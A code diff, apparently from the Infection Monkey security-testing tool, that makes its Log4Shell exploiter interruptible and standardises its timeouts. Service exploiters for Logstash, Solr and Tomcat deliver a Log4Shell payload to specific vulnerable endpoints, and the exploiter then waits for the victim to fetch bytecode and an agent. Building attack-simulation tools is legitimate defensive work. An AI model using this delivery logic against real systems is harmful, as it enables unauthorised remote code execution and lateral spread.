Agent: Make log4shell interruptable

monkey/infection_monkey/exploit/log4shell.py

@@ -1,6 +1,7 @@
 import logging
 import time
 
+from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT
 from infection_monkey.exploit.log4shell_utils import (
     LINUX_EXPLOIT_TEMPLATE_PATH,
     WINDOWS_EXPLOIT_TEMPLATE_PATH,
@@ -12,7 +13,6 @@ from infection_monkey.exploit.log4shell_utils import (
 from infection_monkey.exploit.tools.http_tools import HTTPTools
 from infection_monkey.exploit.web_rce import WebRCE
 from infection_monkey.i_puppet.i_puppet import ExploiterResultData
-from infection_monkey.model import DOWNLOAD_TIMEOUT as AGENT_DOWNLOAD_TIMEOUT
 from infection_monkey.model import DROPPER_ARG, LOG4SHELL_LINUX_COMMAND, LOG4SHELL_WINDOWS_COMMAND
 from infection_monkey.network.info import get_free_tcp_port
 from infection_monkey.network.tools import get_interface_to_target
@@ -25,10 +25,8 @@ logger = logging.getLogger(__name__)
 class Log4ShellExploiter(WebRCE):
     _TARGET_OS_TYPE = ["linux", "windows"]
     _EXPLOITED_SERVICE = "Log4j"
-    SERVER_SHUTDOWN_TIMEOUT = 15
-    REQUEST_TO_VICTIM_TIMEOUT = (
-        5  # Max time agent will wait for the response from victim in SECONDS
-    )
+    SERVER_SHUTDOWN_TIMEOUT = LONG_REQUEST_TIMEOUT
+    REQUEST_TO_VICTIM_TIMEOUT = MEDIUM_REQUEST_TIMEOUT
 
     def _exploit_host(self) -> ExploiterResultData:
         self._open_ports = [
@@ -135,6 +133,11 @@ class Log4ShellExploiter(WebRCE):
         # because we don't know which services are running and on which ports
         for exploit in get_log4shell_service_exploiters():
             for port in self._open_ports:
+
+                if self._is_interrupted():
+                    self._set_interrupted()
+                    return self.exploit_result
+
                 logger.debug(
                     f'Attempting Log4Shell exploit on for service "{exploit.service_name}"'
                     f"on port {port}"
@@ -147,24 +150,26 @@ class Log4ShellExploiter(WebRCE):
                         f"potential {exploit.service_name} service: {ex}"
                     )
 
+                if self._is_interrupted():
+                    self._set_interrupted()
+                    return self.exploit_result
+
                 if self._wait_for_victim():
                     self.exploit_info["vulnerable_service"] = {
                         "service_name": exploit.service_name,
                         "port": port,
                     }
                     self.exploit_info["vulnerable_urls"].append(url)
-                    self.exploit_result.exploitation_success = True
                     self.exploit_result.propagation_success = True
 
     def _wait_for_victim(self) -> bool:
-        # TODO: Peridodically check to see if ldap or HTTP servers have exited with an error. If
-        #       they have, return with an error.
-        victim_called_back = False
-
         victim_called_back = self._wait_for_victim_to_download_java_bytecode()
         if victim_called_back:
             self._wait_for_victim_to_download_agent()
 
+        if self._is_interrupted():
+            return False
+
         return victim_called_back
 
     def _wait_for_victim_to_download_java_bytecode(self) -> bool:
@@ -174,8 +179,12 @@ class Log4ShellExploiter(WebRCE):
             start_time, Log4ShellExploiter.REQUEST_TO_VICTIM_TIMEOUT
         ):
             if self._exploit_class_http_server.exploit_class_downloaded():
+                self.exploit_result.exploitation_success = True
                 return True
 
+            if self._is_interrupted():
+                return False
+
             time.sleep(1)
 
         logger.debug("Timed out while waiting for victim to download the java bytecode")
@@ -184,10 +193,14 @@ class Log4ShellExploiter(WebRCE):
     def _wait_for_victim_to_download_agent(self):
         start_time = time.time()
 
-        while not self._victim_timeout_expired(start_time, AGENT_DOWNLOAD_TIMEOUT):
+        while not self._victim_timeout_expired(start_time, LONG_REQUEST_TIMEOUT):
             if self._agent_http_server_thread.downloads > 0:
                 break
 
+            if self._is_interrupted():
+                return
+
+            # TODO: if the http server got an error we're waiting for nothing here
             time.sleep(1)
 
     @classmethod

monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/logstash.py

@@ -2,6 +2,7 @@ from logging import getLogger
 
 import requests
 
+from common.common_consts.timeouts import MEDIUM_REQUEST_TIMEOUT
 from infection_monkey.exploit.log4shell_utils.service_exploiters import IServiceExploiter
 from infection_monkey.model import VictimHost
 
@@ -15,7 +16,7 @@ class LogStashExploit(IServiceExploiter):
     def trigger_exploit(payload: str, host: VictimHost, port: int):
         url = f"http://{host.ip_addr}:{port}/_node/hot_threads?human={payload}"
         try:
-            requests.get(url, timeout=5, verify=False)  # noqa DUO123
+            requests.get(url, timeout=MEDIUM_REQUEST_TIMEOUT, verify=False)  # noqa DUO123
         except requests.ReadTimeout as e:
             logger.debug(f"Log4shell request failed {e}")
 

monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/solr.py

@@ -2,6 +2,7 @@ from logging import getLogger
 
 import requests
 
+from common.common_consts.timeouts import MEDIUM_REQUEST_TIMEOUT
 from infection_monkey.exploit.log4shell_utils.service_exploiters import IServiceExploiter
 from infection_monkey.model import VictimHost
 
@@ -15,7 +16,7 @@ class SolrExploit(IServiceExploiter):
     def trigger_exploit(payload: str, host: VictimHost, port: int):
         url = f"http://{host.ip_addr}:{port}/solr/admin/cores?fu={payload}"
         try:
-            requests.post(url, timeout=5, verify=False)  # noqa DUO123
+            requests.post(url, timeout=MEDIUM_REQUEST_TIMEOUT, verify=False)  # noqa DUO123
         except requests.ReadTimeout as e:
             logger.debug(f"Log4shell request failed {e}")
 

monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/tomcat.py

@@ -2,6 +2,7 @@ from logging import getLogger
 
 import requests
 
+from common.common_consts.timeouts import MEDIUM_REQUEST_TIMEOUT
 from infection_monkey.exploit.log4shell_utils.service_exploiters import IServiceExploiter
 from infection_monkey.model import VictimHost
 
@@ -16,7 +17,9 @@ class TomcatExploit(IServiceExploiter):
         url = f"http://{host.ip_addr}:{port}/examples/servlets/servlet/SessionExample"
         payload = {"dataname": "foo", "datavalue": payload}
         try:
-            requests.post(url, data=payload, timeout=5, verify=False)  # noqa DUO123
+            requests.post(  # noqa DUO123
+                url, data=payload, timeout=MEDIUM_REQUEST_TIMEOUT, verify=False
+            )
         except requests.ReadTimeout as e:
             logger.debug(f"Log4shell request failed {e}")